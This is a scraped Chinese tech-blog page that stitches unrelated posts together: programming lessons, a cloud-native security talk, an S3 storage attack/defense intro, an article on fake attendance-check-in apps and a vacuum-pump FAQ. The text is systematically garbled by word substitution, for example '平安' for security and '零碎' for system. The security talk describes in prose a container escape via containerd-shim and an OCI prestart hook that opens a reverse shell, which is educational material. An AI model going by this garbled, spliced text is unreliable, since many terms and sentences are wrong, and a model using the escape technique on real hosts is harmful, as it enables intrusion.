美金,屡次发动退款接口天然也没问题,所以我有一些重试的机制来确保退款胜利。过了一段时间后发现账目上有点差异,起初通过排查是因为反复调用了退款接口,这个接口如果两次调用就会退给客户退 200 美金! 最初咱们只能发邮件给一些客户,说多退了钱,麻烦能退回来么,有的客户很善意就间接返回了钱。我记得有个客户回复说:我认为这是上帝给我的赏赐,对不起我曾经花完了。 额,我就是那个可怜的上帝好么。 并发问题我前公司所在的部门已经有个发货零碎,当多过程跑起来的时候,有个并发问题没解决好,最终导致用户收到多份雷同的货物。 当程序员经验不足的时候这种谬误就很容易呈现。代码中哪些局部是能够重入的,哪些局部须要加锁,都须要认真思考。然而在业务疾速倒退,疾速堆代码的时候,咱们可能不肯定有足够的工夫把所有细节都思考分明。 配置谬误我之前呈现过的一个最大的谬误是因为配置谬误。这件事我始终都记得,因为印象切实是粗浅,当初对正则表达式都有所恐怖。 那天我正筹备上班回家,我配置了一些平安上的防护规定。而后我的 Leader 说拦挡的页面不够难看,咱们要不对立个拦挡页面。我想了一下感觉很简略,就筹备在咱们本人定制的网关 (Kong) 上配置一条全局规定,我想通过正则表达式把所有拦挡页面 redirect 到订制的谬误页面。 我通过后盾 Admin 页面,在一个全局插件上写下了一条正则表达式,提交失效。而后立马就收到了报警,大量零碎同时报警!因为有公司很多域名的申请都通过这个网关,而我配置的正则表达式嵌入到 Lua 代码中后有语法错误,导致所有零碎的路由解决时都报错。 最要命的是咱们的 Admin 页面也会通过这个网关,所以 Admin 页面也没法拜访了,意味着我无奈通过页面去回滚配置!我过后曾经手心发汗,如热锅上的蚂蚁了。强制本人慌张下来,马上批改插件的代码,连忙让运维一起迅速地服务器上网关更新。 整个过程大略破费了 20 分钟,这期间整个公司预计有一半的零碎都是不能拜访的,包含那些官网、商城等。 经验总结犯错并不可怕,只有是集体就可能会犯错。呈现谬误往往也不止是集体的问题,也意味着团队有问题,比方对代码品质要求不够,零碎设计不够容错,权限划分不够好,平安机制不健全,没有 代码 Review 等等。谬误是集体和团队最好的学习、进步的机会,而且咱们曾经交了学费。 然而随着咱们成长,最好防止集体犯一些低级的谬误,特地是安全类的问题。写程序、做零碎设计的时候就做好进攻,把犯错的概率升高到最小。 进攻编程面包落地的时候,永远是抹黄油的一面着地。下面配置的问题,我在做网关的时候其实意识到了潜在危险, Admin 路由也通过本人管制那出问题不就嗝屁了吗?过后我自我安慰只有不对这个路由开有问题的全局插件就能够了,所以没有及时处理这个危险,最终导致本人掉入坑里。 当零碎中存在潜在问题时,工夫一拉长呈现的概率就大了。因而咱们编程的时候总要无意识想最坏的状况是什么,哪些是危险操作,比方写数据如果没写入胜利会怎么,如果并发运行了会怎么,如果文件谬误会怎么,这就是进攻式编程。 做零碎设计时,要思考敏感的业务逻辑如何测试,如何在零碎层面躲避谬误。对于敏感的资源肯定要再从统计的角度进行复查。像我那个退款的问题就是对潜在的风险意识不够,想当然地对接口进行了谬误的假如,而对方这个接口不是幂等的。起初咱们在零碎中加了很多查看,确保及时代码有问题也能尽早发现问题。 如果系统对正确性要求高,必须加大量单元测试和集成测试,并且每修复一个 Bug 都引入对应的测试,因为随着代码的一直演进,没人能保障新加的代码不会毁坏掉原来的代码。测试能最大水平自动化地帮咱们发现一些潜在问题。 我工作的第一家公司是做 EDA 相干软件的,因为 EDA 软件不像互联网这样的零碎,crash 了就是产生在客户的机器上,很多时候都没法 debug,因而公司对代码品质要求极高,他们在自动化测试这块就做得十分棒,测试覆盖率简直 100%,还有很多 fuzzy testing。 ...

March 7, 2022 · 1 min · jiezi

关于安全:云原生背景下的应用安全建设

文章首发于:前线Zone社区(https://zone.huoxian.cn/) 大家好,我是徐越,明天分享云原生平安这个话题,云原生平安这个话题其实太大了,我之前所做的一些研究成果,次要是在应用层,所以咱们明天探讨的重点就围绕着云原生的利用平安。 第一块:云原生的利用平安目前倒退到一个什么进度,以及将来它会向哪些方向去延长。 第二块:咱们做技术的是怎么样去入门? 我是从17年开始进入到一线的云厂商,做云平安产品以及平安钻研相干的工作。之前对于云原生畛域的研究成果,从主机平安到Web平安,到容器平安,这些能够在我的博客上找到。https://cdxy.me/about 议题次要分为四个大部分第一局部:云平安当初倒退到一个什么样的阶段,咱们作为一个平安从业者怎么对待这件事件,咱们要不要投入云平安钻研?第二、三局部:从红队和蓝队两个视角去介绍云平安的技术倒退,目前都波及到的技术栈是什么?做这些研究所须要的能力是什么?第四局部:云平安的入坑倡议。 第一局部,首先就是云平安是什么?云平安对于整个平安行业,或者对于咱们每一个技术人来讲,咱们到底怎么对待这个事件?咱们要不要把它当做咱们工作的次要方向去做,这个背地的基本逻辑是什么? 首先整个网络安全行业,它是有很多驱动力在的,其中我认为最强也是周期最长的一个驱动力,就是IT基础设施的倒退。也就是说平安肯定是跟随着基础设施架构倒退去一直演进的。 那么当初基础设施倒退的趋势是什么?就是万物互联,咱们之前讲的,比方晚期的边界进攻到前面的纵深进攻,再到当初咱们发现所有的大型企业级利用,基本上都能看到十分多的云边端的互联,云又分为公有云、私有云,包含云上的SaaS服务等几个方面。 咱们当初看到一个企业级的利用。他其实把十分多的基础设施和能力连贯了起来,比方私有云的IaaS层,以及公有云的IaaS层,VM或者容器等等这些基础设施,包含云上的所有SaaS化的服务,包含企业的利用有可能会跟终端,比方手机端的这些APP,智能汽车外面内置的APP,边缘计算以及传统的企业的IDS,企业外部的办公,以及很多这种PaaS平台对第三方合作伙伴或者开发者凋谢的一些能力。 在万物互联的背景下,边界这个概念在逐步地弱化,资产的攻击面是越来越多的,那么想做好平安这件事件,其实就是要求每一块平安能力要一直的去细化,下沉到基础设施层。 那么咱们看到在这外面,云平安只是万物互联的IT基础设施倒退下的,只是大趋势外面的一部分,那咱们仅探讨云平安这个话题,目前云平安有什么问题,这外面我次要总结进去三点,也是目前业内无论是守业市场,还是平安钻研畛域比拟关注的几个方向。 第一块就是laaS层,也就是基础设施层的挑战,那这一块,就肯定是说传统的VM向容器化,以及微服务化去倒退。 其实业内的话,容器目前曾经十分大规模的在各行各业去落地,那么在根底上咱们发现其实平安是滞后的,那这外面就为攻击者发明了一段时间的钻研空间,以及为防守者提出了一个新的挑战。 第二块就是SaaS层,SaaS层把能力作为软件模式交付,SaaS的利用分为两种,一种是对人的,就是后端用API来做,前端再套一个UI界面,这样子去做它最终的一个交付。还有一种就是对机器的,比如说明天我开发一个APP,可能我须要集成很多的地图功能或者其余性能,那么传统可能须要去买,须要去集成,明天的话,其实只有调一下云上的这些API,做一个付费就能够集成这块能力。 那SaaS挑战次要就是越来越多的企业能力以API的模式进行凋谢和交付,这外面就会波及API的平安爱护问题。 第三块,就是分布式的平安协同问题,也就是企业的基础设施进行了一个大规模的分布式之后,咱们怎么保障网络侧的统一性、接入的有效性、效率、所有的安全策略、以及平安运维在不同的基础架构之下的一个协同。次要目前来讲看到的这几个趋势,以及目前钻研比拟火的几个畛域,根本就是在这里。 从红队的角度来讲,红队当初是一个什么样的钻研状态? 咱们发现红队对容器化的讨论会略微多一点,从2020年微软先发表了一个kubernetes的ATT&CK,其实论述了新的IT基础设施架构下,尤其是kubernetes和容器的架构下,和传统的VM的攻打思路有哪些不一样。从那个时候开始,咱们看到大量的云厂商、平安厂商,企业的甲方,都开始投入云原生的平安钻研,包含很多的大厂建设了专门的云原生的红队。 上图是在2020年,我在云厂商的时候,做了一版更粗疏的所有攻打的一些形容,又增加了一些针对云平台的攻打伎俩。 接着在2021年的云鼎这边提出的云平安攻防矩阵,是在此之上进行了又一次的丰盛,这外面咱们其实能够看到它曾经辨别进去了整个云的基础设施,包含云服务器的攻击方式,也就是传统Linux或者Windows的server;而后是容器这一块,比如说这个docker和kubernetes,以及容器的一些镜像仓库,还有其余的一些中间件和基础设施的攻击方式;而后是云服务这一块,比方咱们当初看到被攻打比拟多的云存储,可能常常会呈现这种权限问题,泄露数据的一些问题,包含一些云平台自身的账户泄露,或者云平台的API入侵等等。 那么我感觉入门云平安的话,从攻击者的视角来讲,看到所有的这些工具技术,去了解把握这外面所有的攻打模式,就可能对云平安外面应用层、基础设施层的平安攻打伎俩有一个宏观的理解,大略就可能晓得云平安咱们到底在探讨哪些技术,这个是从红队视角去讲。 那么咱们细节一点,云平安具体带来哪些新的攻击面?次要是左边咱们所讲的这三块,第一块就是新的基础设施,像k8s或者serverless function,以及当初咱们讲的这个mesh架构,它的一些基础设施的破绽,以及在他下面所成长的一些利用中存在的利用破绽。 而后第二块,就是云平台自身,那云平台的话,其实历史上咱们也看到呈现过很多问题,其实大部分都是因为这个凭证泄露,而后去通过一些比如说云助手,一些API的通道,去操纵这个云账号或者云资产导致的一些平安问题。而后第三块就是云服务的一些API,比如说云的存储,云的计算,而后云的认证,以及其它的很多第三方的能力输入,这外面还是之前说的,一方面是API加UI,另外一方面就是间接的API攻打,这一块造成的危害也是很大的,之前咱们看到出了很多,这种云存储导致企业数据泄露的状况。针对这几种攻击面变动的这些工具,我在下面列出来,就是这个小字外面,这外面都是github上的一些开源我的项目,入门的话能够去参考一下他们笼罩了哪些攻击点,以及实现攻打的逻辑。 讲到云平安最次要的一个场景,就不得不说容器这一块。我右边那个图画了一部分攻打场景。次要包含攻击者对于容器的基础设施,以及对于这种SaaS化的云上的利用,以及云上服务基础设施的这些攻打门路。这里咱们能够去略微的了解一下,这个入口点,以及这个提权逻辑,以及这个长久化逻辑,以及窃取数据逻辑,可能会跟传统的Linux或者Windows的攻打的门路会有一些差别,也是说这两年来咱们看到越来越多的红队开始这方面的武器化钻研。 接下来如果说咱们想做这个云原生的,再往深刻一点,就是想做到IaaS层的平安的话,其实它是一个比拟艰难的话题。这个其实咱们包含之前我在做这一块平安的时候,也和其余的一些容器平安相干的一些厂商去交换过,就是这块的钻研为什么会有肯定的门槛,就在于它其实是多种技术能力的交融。比如说你首先要懂Linux,而后还要懂这个虚拟化,比如说docker或者k8s的一个架构和原理,而后当然你还要有一个攻防的思维。这个是三种能力的联合,导致你能够在这一块做破绽开掘,或者做一些平安计划性的建设。 咱们举一个例子是一个老破绽,这个破绽,其实是一个公开的货色,包含Exp也是公开的。为什么要提这个事件? 其实是给大家领会一下做这个破绽的攻打和复现的时候,咱们会波及到多少个知识面。首先右边这一块是官网的一个破绽形容,咱们看到这些名词,首先就是这些名词是否了解,这个containerd,而后这个shim,runc,unix socket,包含这个前面的一些通信协定这一块,咱们有没有这个基础知识,能不能做这件事件,包含前面的Exp怎么写。 这外面所有的这些概念其实都是要去钻研,都是要去积攒的,而后在此基础上,咱们能力去做这个IaaS层的破绽的一些剖析工作。 从原理上来讲,首先就是说这外面会分为几层,就比方首先从这个k8s层,通过containerd去做这个容器的治理,前面又形象了一层,能力的接口用作这个shim,而后前面整个虚线框起来的这个货色,其实就是每一个容器,它所解决的,在Linux体系外面所存在的一个过程的关系。其实容器逃逸它实质上就是一个Linux隔离的问题,就是一个低权限的过程,我怎么能做到变成一个高权限的过程。 那这里首先你得在这个Linux这个维度可能十分分明地理解,就Linux的一些权限隔离机制,比如说Linux Namespaces和Capabilities这几个货色是怎么实现的,而后能力去了解这个破绽的一个利用原理。在编写Exp的过程中,你还要对containerd,或者说这个整个k8s、docker的这个细节到源码级的性能要有一个理解,比如说这个破绽开掘者,他所提出来的一个Exp的思路,就是通过shim这个高权限过程共享网络空间的时候,能够间接通过一个低权限操纵这个高权限过程,而后管制它再起个容器,再起一个容器的过程中,咱们给它更高的一个权限,而后再通过这个容器外部去操纵宿主机资源,最初拿到宿主机shell。 这个流程其实是一个十分通用的容器逃逸流程。然而如果你做过OCI研发,或者看过这一块文档的时候,其实你能够提出一个更不便的办法,就比如说左下角这个图,其实OCI它提供了十分多的hook,就在容器的启动过程中,这个hook外面有一个prestart,这外面间接能够反弹shell,在起容器的过程中,甚至这个容器都不必真正的跑起来,它就能够间接bash命令间接执行。 这个Exp咱们也是收录在那个CDK的左边那个链接外面,感觉有趣味的同学或者有肯定积攒的同学能够钻研一下,大略也就能了解做IaaS层的破绽钻研和开掘须要哪些积攒,这是一个例子。 而后针对入门门路,挖洞的话咱们大家能够从这一块动手,挖洞这个货色我不太倡议大家上来一下子就要挑战特地难的一个指标,比如说我要搞一个 k8s RCE进去,咱们再CNCF的landscape图外面能够看到当初整个云原生的生态体系,曾经衍生出了十分多的利用和中间件。那这外面其实我还是倡议如果入门的话,咱们先挑一些本人跳一下可能失去的指标,一步一步地循序渐进的,从简略到难去实现这一块的钻研。 挖洞这外面其实有一个我感觉比拟好出洞的一个思路,就是说多组件平安的设计不统一。这个思路其实在orange之前的几次blackhat演讲外面体现的很显著,就是说我单个组件拎进去是没有问题的,然而多个组件针对一种协定,一种标准,它的实现外面是有不统一的点,那么我思考整个利用流程过程中,其实多个组件它拼凑在一起的时候,这些不统一的点,有可能就会成为破绽的起因。 这里有一个有意思的案例,我在上面也放了链接。咱们做红队或者破绽这块的钻研,它实质上还是一个积攒的过程,如果咱们对整个云原生的生态体系,包含组件,钻研的特地粗疏的话,其实这外面的破绽还是很多的,相比你间接去挖这个Linux和Windows破绽来讲的话,这一块依然是一个蓝海。 下面是红队这一块,而后蓝队这一块,也就是说企业从防守方的角度去思考,怎么去建设云原生这一块的平安体系。 首先第一块蓝队应该留神的,平安责任区这里是有个变动的,那咱们看到当初的基础设施,从右边的传统的虚拟机下面间接跑APP,而后到当初的虚拟机容器APP,再往后容器都曾经on demand,包含到前面的serverless,底层的这些货色曾经被云厂商或者云服务提供商默认的做平安掉了,就是图外面这个灰色的局部。 图外面这个浅蓝色的局部,其实是一个云厂商和用云计算的企业共担的一个责任区,那么深蓝色的局部,就是企业次要去负责去建设的一块平安的责任区,其实咱们看到一直的往后去倒退,IaaS基础设施的服务化水平越重大,其实企业在外面须要解决的平安问题是越来越少的,所以咱们为什么说云其实是在某种程度上来讲是更平安的,就是这个情理。 而后就目前来讲,针对大量利用上云的企业,咱们看到了一些显著攻打的趋势,就目前来讲,对云平台以及容器基础设施的攻打曾经十分宽泛了。这不是一个新的话题,而是说当初所有的这些公网上的这些蠕虫也好,僵尸网络也好,都默认集成了这些对于容器,对于K8S的一些攻打伎俩,如果说一些比拟low的破绽,可能你开到网上霎时就被入侵。 第二块就是方才我所讲的这个趋势,基础设施层会由云厂商去默认地做到平安。在此基础上业务层的货色更是企业须要解决的一个问题,比如说凑近人的货色,其实它是永远不会沦亡的一个平安话题,包含人员的行为管控、鉴权以及凭证泄露导致的一些平安问题。 另一方面利用平安也不会隐没,就是包含所有的云的基础设施下面跑的企业应用代码,所有应用层和业务层的平安,它跟以前是一样的,它会始终存在,比如说web畛域,包含这个利用中间件,利用组件破绽,以及一些供应链的危险,这个是一贯存在的。那么在这一块云平台厂商默认做平安的策略之下,其实还是方才讲的这三个方向是企业须要关注的一个重点。比方当初咱们看到这个容器平安,k8s平安,API平安,以及分布式的平安协同,分布式平安协同这个词是我造的,包含当初咱们看到的XDR、CSPM、SASE,或者零信赖等等,其实它实质上解决的就是一个大规模分布式架构下的平安协同问题。 另一方面,咱们这边有在甲方或者在企业侧做蓝队的同学可能除了技术之外,还会遇到一些其余方面的挑战,比如说安全部门在做一些基建,在做一些安全策略的时候,可能会跟业务方呈现抵触,或者说咱们没有拿到足够多的估算,足够多的资源去实现一个整体的平安水位的晋升。 那这外面咱们思考更深一层的问题,在甲方去做这个平安建设,肯定会遇到一个资源问题。资源问题背地的其实是平安团队的一个定位问题,也就是说咱们做平安建设总提到一句老话叫“出了事儿要你何用,没出事儿要你何用”。其实这个实质背地是一个定位的问题,如果说咱们可能把这个平安与业务的对抗的关系转化成单干的关系,也就是说把安全部门的一个定位,从保障业务到赋能业务做一个转化的话。 其实就能够去为安全部门,或者说为平安钻研带来更多的资源,就可能保障更多的技术同学,他有一个很好的环境去钻研云平安畛域或者新兴的一些平安的技术。这里其实对于一线的甲方从业者,我是倡议大家要跳出平安攻防思维的模式,多去接触业务,就能够实现从保障到赋能业务的安全部门定位的转化。 ...

March 4, 2022 · 1 min · jiezi

关于安全:云安全AWS-S3-对象存储攻防

文章首发于:前线Zone社区(https://zone.huoxian.cn/) 对象存储(Object-Based Storage),也能够叫做面向对象的存储,当初也有不少厂商间接把它叫做云存储。 说到对象存储就不得不提 Amazon,Amazon S3 (Simple Storage Service) 简略存储服务,是 Amazon 的公开云存储服务,与之对应的协定被称为 S3 协定,目前 S3 协定曾经被视为公认的行业标准协议,因而目前国内支流的对象存储厂商基本上都会反对 S3 协定。 在 Amazon S3 规范下中,对象存储中能够有多个桶(Bucket),而后把对象(Object)放在桶里,对象又蕴含了三个局部:Key、Data 和 Metadata。 Key 是指存储桶中的惟一标识符,例如一个 URL 为:https://teamssix.s3.ap-northe...,这里的 teamssix 是存储桶 Bucket 的名称,/flag 就是 Key Data 就很容易了解,就是存储的数据本体 Metadata 即元数据,能够简略的了解成数据的标签、形容之类的信息,这点不同于传统的文件存储,在传统的文件存储中这类信息是间接封装在文件里的,有了元数据的存在,能够大大的放慢对象的排序、分类和查找。 操作应用 Amazon S3 的形式也有很多,次要有以下几种: AWS 控制台操作AWS 命令行工具操作AWS SDK 操作REST API 操作,通过 REST API,能够应用 HTTP 申请创立、提取和删除存储桶和对象。 对于对象存储就介绍到这里,上面来看看在对象存储下的一些攻防手法。 在 Bucket 的 ACL 处,能够抉择容许那些人拜访。 如果设置为所有人可列出对象,那么只有晓得 URL 链接就能拜访,对于设置为公有的状况下,则须要有签名信息能力拜访,例如 https://teamssix.s3.ap-northe... 对于敏感文件,倡议权限设置为公有,并造就爱护签名信息的安全意识。 实践上,如果公开权限文件的名称设置的很简单,也能在肯定水平上保障平安,但不倡议这样做,对于敏感文件,设置为公有权限的安全性要更高。 ...

March 4, 2022 · 2 min · jiezi

关于安全:嗨购开工季-请查收你的专属薅羊毛必备攻略

March 4, 2022 · 0 min · jiezi

关于安全:网上的考勤神器其实是黑灰产作弊工具

梁女士是一家保险公司的代理人,平时不须要坐班,本来只须要实现每月保费额度即可能支付到月工资。9月份,公司忽然告诉,自10月起,公司会核查员工出勤率,并将其率纳入薪酬考核。如果出勤率低于当月工作日的90%,则被视为旷工、销假。 梁女士所在保险公司出勤率考查的形式就是刷脸打卡。公司提供两种打卡形式:第一种是站在公司前台的智能考勤机前实现刷脸打卡;第二种集体的智能手机连贯上公司的无线网络,应用公司的保险代理人App实现自助刷脸打卡。 无论哪一种打卡形式,对于间隔公司30多公里、须要每天接送孩子上学的梁女士来说陷入两难:要么每天去公司打卡下班,要么全职在家接送孩子上学。 随着10月份越来越近,梁女士束手无策时,有个好敌人举荐了一个“考勤打卡神器”。应用这个“考勤打卡神器”,梁女士不须要赶到公司,也不必连贯公司的无线网络,在家里、在商场、甚至在海边玩耍也能够实现刷脸打卡,稳当妥每月拿到全勤奖。 神秘的“考勤神器”是什么? 梁女士应用的“打卡神器”到底是什么呢?网上搜寻“破解人脸打卡”,有几百万条后果,不仅有具体的图文介绍,更有手把手教人如何“考勤舞弊”的视频。 除此外,电商平台上也有大量“XX异地考勤打卡助手”、“考勤打卡助手”、“考勤打卡更改地址”等产品和服务发售。买家只须要破费几十元,甚至十几元就能够购买到。 顶象业务平安反欺诈专家在某电商平台上找到一个“XX考勤打卡助手”商品,显示付款人数1000+,销价格为30元。拍下后,该商家发来了一个软件下载链接和一条应用视频,并示意,这个“考勤打卡助手”,可轻松扭转打卡的地位,能在任何中央进行考勤打卡。 通过对商家发来的“XX考勤打卡助手”剖析发现,这其实是一个黑灰产舞弊工具。该工具破解了某保险公司的代理人官网App,而后对App进行篡改后进行二次打包,变成一个“山寨App”。 该“山寨App”可能屏蔽摄像头影像采集、拦挡无线网络检测,并对GPS劫持,伪造虚伪的LBS地理位置。在进行相干设置后,保险公司员工输出本人的工号,上传本人的照片即实现“考勤打卡”。 此外,如果买家不会应用被该工具,商家还提供“XXXX打卡考勤服务”,买家只需提交本人的工号和对应的照片,商家近程就能够代买家实现“刷脸打卡”,价格只有几元钱。 顶象业务平安反欺诈专家剖析,商家提供的提供“XXXX打卡考勤服务”,应该也是一个被破解篡改的“山寨App”,只是性能可能更大。例如,反对多人信息并行打卡,输出多条信息后可能主动排序打卡等。 虚伪考勤给黑灰产带来数亿元支出 银保监会数字显示,截止到2020年10月,全国共有保险业余代理法人机构1776家,个人保险代理人900万人。 因为“打卡神器”可能很轻松接触且购买到,置信有大量梁女士相似需要的从业者在应用该类工具进行虚伪考勤打卡。依照10%概率计算,估算下来就有90万人。基于电商平台上“XX保险考勤打卡助手”的28元的价格计算,单纯销售保险行业的虚伪考勤打卡服务,就可能给黑灰产带来数亿元非法收益。 “考勤打卡神器”让黑灰产牟利,却让保险公司受伤。 虚伪考勤不仅给保险公司带来人工、薪酬、治理、业务等损失,还为虚伪入职提供便当。更有从业者利用“考勤打卡神器”等相似工具,办理虚伪入职后,套取保险公司的薪酬和处分,由此给保险公司带来无奈估算的经济损失。 “考勤打卡神器”背地的黑灰产业链 “考勤打卡神器”毁坏公司失常考勤秩序,给公司带来经济损失,背地有多个起因。 某保险经纪人示意,保险公司的经营体制就是增员、打业务,两者缺一不可。保险公司每年3-4次大规模增来的新人,带来的新契约保费占比能达到全年的50%甚至更多。为了达成公司业绩和考核,很多营销人员采取虚伪增员,骗取下级公司的人头费。他认为,“考勤打卡神器”的呈现是保险行业倒退阵痛的缩影。 专一劳动纠纷的律师卢杨示意,企业的管理制度为了生产治理效力,然而也须要思考劳动者的现实情况,很多违规问题呈现,一是制度的破绽,二是治理流程不欠缺,须要良好联合现实情况。 一位不违心走漏姓名的平安专家示意,“考勤打卡神器”是黑灰产的破解舞弊工具,只是被拿进去用于公开牟利应用。他说,虚伪考勤打卡的形式很多,不仅是利用舞弊工具,还能够间接篡改考勤打卡设施、批改考勤零碎数据等。“这个市场比拟成熟了,从代码篡改到招揽客户,曾经造成一条残缺的产业链。” 顶象公司组编、机械工业出版社出版的《攻守道-企业数字业务平安危险与防备》一书中,对黑灰产有明确的定义:网络黑灰产是指利用计算机、网络等伎俩,基于各类破绽,通过恶意程序、木马病毒、网络、电信等模式,以非法盈利为目标规模化、组织化、分工明确的群体组织。 互联网黑灰产业链分为上游、中游、上游。其中上游是工具组,提供各类破解工具、打码平台、伪造工具、代理工具;中游是信息组,提供社工库、垃圾注册、盗号、洗号、信息盗取、数据爬虫等;上游是变现组,对数字类业务施行刷单、刷粉、薅羊毛等危险欺诈攻打。 “考勤打卡神器”的制作过程 顶象业务平安反欺诈专家剖析发现,梁女士应用的“考勤打卡神器”是破解了某保险公司的官网App,而后对App进行篡改后进行二次打包,变成一个山寨App。该山寨App通过屏蔽摄像头影像采集、拦挡无线网络检测,并对GPS劫持,伪造虚伪的LBS地理位置。在进行相干设置后,梁女士输出本人的工号、上传照片即实现“考勤打卡”。 山寨App是十分典型的业务危险欺诈伎俩。黑灰产通过对App进行反编译,篡改相干参数并植入恶意代码,而后重装打包并公布App,进而窃取用户隐衷、歹意推广、骗取钱财等。 黑灰产个别会抉择知名度高或者应用多App来进行破解篡改,其制作流程次要有以下几个步骤。 1、以假乱真,混同眼帘。黑灰产通过网络爬虫盗取正版App的数据,或者间接通过电商平台购买App模板,间接仿照正版App的图标、首页、名称等设计制作,以达到混同的目标。 2、绕过审核,市场上架。通过各种形式,将山寨App入驻第三方App市场。因为大多数App市场只是对App进行平安和兼容性测试,以及利用合规审核(查看利用中是否是黄赌毒等违禁内容和服务),对于App是否存在模拟疏于甄别,这就给了违规App堂而皇之登陆正规利用市场的机会。 3、刷榜推广,诱导下载。黑灰产通过刷榜、刷评论、积分墙等形式在利用市场内推广,抢占下载排行榜,晋升曝光度和关注度。同时,还会通过短信、社群、社区、网盘等形式诱导用户下载。 4、国家互联网金融风险剖析技术平台公布的监测数据显示,截至2020年2月底,发现山寨App 2801个,下载量3343.7万次。这些山寨App不仅给用户带来隐衷和资产损失,更让正规App蒙受不白之冤,给品牌带来挫伤,更给企业业务的发展带来微小负面影响。 “山寨App”给用户带来哪些危险? 山寨App不仅给企业带来资金损失,更会窃取使用者隐衷,造成使用者和企业资金损失。 1、窃取用户隐衷。山寨App会自从保留收集用户的账号密码等会被窃取他用,更可能主动读取并复制手机通讯录、相册、地位、聊天信息等隐衷信息。 2、盗取账户资金。山寨App会收集到账号信息,及时登录正规App平台,将账号内资金、积分、余额会被黑灰产转走盗用,间接给用户带来财产损失。 3、用于歹意推广。山寨App会通过弹窗、诱导下载等各种形式,举荐用户下载其余App或山寨App,或者为守法App导流,甚至局部山寨App内置木马病毒,主动公布短信、链接等。 4、欺诈免费。山寨App 会向用户收取各种手续费、会员费、服务费、保证金、工本费等等,给用户带来资金损失。 防备虚伪考勤,企业须要在三方面着手 网上的“考勤打卡神器”尽管可能解决局部从业者打卡的“懊恼”,但这是一种虚伪考勤行为,是一种职场失信,对集体职场倒退十分不利,一旦被公司发现,不仅会被记录在集体职业信息里,影响工资、奖金、评优、升职等。 顶象业平安反欺诈专家认为,企业须要在治理、处罚以技术上着手,多方面防备虚伪考勤打卡: 1、建设迷信的考勤制度。考勤是为保护企业的失常工作秩序,进步办事效率,庄重企业纪律,使员工自觉遵守工作工夫和劳动纪律,让员工融入公司融入团队之中从而发明更大的效益,是一种谨严、清晰的制度体系。因而考勤应该与下班、排班、工时、休假、加班、津贴、贴补、薪酬、奖金、升职、加薪等体系挂钩,用于掂量员工的薪资和劳动。 2、严格处罚虚伪考勤。虚伪考勤重大的违纪行为,这是对劳动关系的重大舞弊,公司更能够根据《劳动合同法》,对违反了用人单位的制度的集体解除劳动合同,且不须要给予经济弥补。例如,国内某出名公司的《员工行为规范》中明确注明,替人代打卡或要求别人代打卡,虚报考勤属于一级违规。公司将毫无保留地与涉事员工解除合同,并要求其在最长不超过2个工作日内办完到职手续。 3、保障考勤设施的安全性。工欲善其事必先利其器,企业既然曾经洽购智能好用的考勤零碎,更须要加强平安防护性。例如,顶象挪动态势感知进攻零碎可能无效防备虚伪考勤、人脸识别舞弊、打卡舞弊等危险,良好保障公司失常考勤秩序。 企业如何防备“考勤打卡神器 企业须要在治理、处罚以技术上着手,多方面防备虚伪考勤打卡。 1、建设迷信的考勤制度。考勤是为保护企业的失常工作秩序,进步办事效率,庄重企业纪律,使员工自觉遵守工作工夫和劳动纪律,让员工融入公司融入团队之中从而发明更大的效益,是一种谨严、清晰的制度体系。考勤应该与下班、排班、工时、休假、加班、津贴、贴补、薪酬、奖金、升职、加薪等体系挂钩,用于掂量员工的薪资和劳动。 2、严格处罚虚伪考勤。虚伪考勤重大的违纪行为,这是对劳动关系的重大舞弊,公司更能够根据《劳动合同法》,对违反了用人单位的制度的集体解除劳动合同,且不须要给予经济弥补。例如,国内某出名公司的《员工行为规范》中明确注明,替人代打卡或要求别人代打卡,虚报考勤属于一级违规。公司将毫无保留地与涉事员工解除合同,并要求其在最长不超过2个工作日内办完到职手续。 3、保障考勤设施的平安。工欲善其事必先利其器,企业既然曾经洽购智能好用的考勤零碎,更须要加强平安防护性。例如,顶象挪动态势感知进攻零碎可能无效防备虚伪考勤、人脸识别舞弊、打卡舞弊等危险,良好保障公司失常考勤秩序。

March 3, 2022 · 1 min · jiezi

关于安全:分子泵真空泵的故障维修服务

涡轮分子泵是利用高速旋转的动叶轮将动量传给气体分子,使气体产生定向流动而抽气的真空泵。涡轮分子泵的长处是启动快,能抗各种射线的照耀,耐大气冲击,无气体存储和解吸效应,无油蒸气净化或净化很少,能取得清洁的超高真空。涡轮分子泵宽泛用于高能加速器、可控热核反应安装、重粒子加速器以及真空镀膜等须要取得高真空度制作工艺中。 涡轮分子泵的工作原理,构造型式及其优缺点。 为了利用涡轮分子泵,取得清洁真空,国外多利用干式机械泵作其前级泵,形成无油的真空零碎。然而,目前国内涡轮分子泵多以油封机械泵为其前级泵,形成了有油真空零碎,如果操作不当,很难防止油蒸汽返流,对真空零碎的净化。利用有油零碎取得清洁真空,国内外都有一些无效避免返流的措施和胜利的操作教训。 利用:当今,现代化的半导体行业中,越来越多地利用涡轮分子泵。如溅射、刻蚀、蒸发、注入、分子束内涵、离子加工等设施都须要在真空环境下运行。又如电子显微镜,外表分析仪器,残余气体分析仪及氦质谱检漏仪等也常常应用涡轮分子泵来抽真空。此外,在宇宙模仿设施、核聚变安装、太阳能集热管镀膜生产线上也都改用大型涡轮分子泵或低温泵来代替油扩散泵零碎,以避免油蒸汽的净化。因而,最近十几年来,涡轮分子泵,在国内、外都失去了显着的改良和倒退。在涡轮分子泵的利用日益减少干式的前级泵还没有大量遍及和利用的状况下,有时还不得不用油封机械泵来作涡轮分子泵的前级泵。因而,针对这种现状,对涡轮分子泵的正当选用和正确操作是很重要的。 分子泵常见的故障问题: 1、分子泵为何会产生半边热,半边冷的景象? 2、分子泵应用中发现油发黑,请问油为什么发黑?或者多长时间油才会变黑? 3、分子泵在运行过程中,呈现频率从失常降落至肯定频率后又复原到失常,之后又降落至肯定频率,再复原到失常,反反复复,更换电源后景象仍如此,请问该景象如何解释? 4、分子泵轴承为什么会烧毁 5、有防护网爱护,为什么还会有大块碎玻璃掉入泵内? 6、真空度很好的状况下,分子泵油为何会返到前级管道? 7、失常应用下,为什么分子泵油池会呈现裂纹或者变形? 8、分子泵中常常掉出顶丝、镙钉等物体,如M5的顶丝等,请问是否对分子泵的应用有影响?应如何解决? 9、胶圈口分子泵要用多少卡钳,应用才平安? 10、变频器电源在什么状况下会造成程序失落或者错乱? 11、分子泵乐音大如何界定?是否有合格规范,是多少? 12、分子泵是否对冷却有明确要求?如风冷须要外界温度是多少?如水冷则对水有何具体要求?如未达到要求会呈现何结果? 13、分子泵电源存在接地、屏蔽等问题,应如何做才是最佳形式? 14、变频器电源,转速回升过程中就自动关机,即显示“Poff”? 15、分子泵叶片破碎的起因? 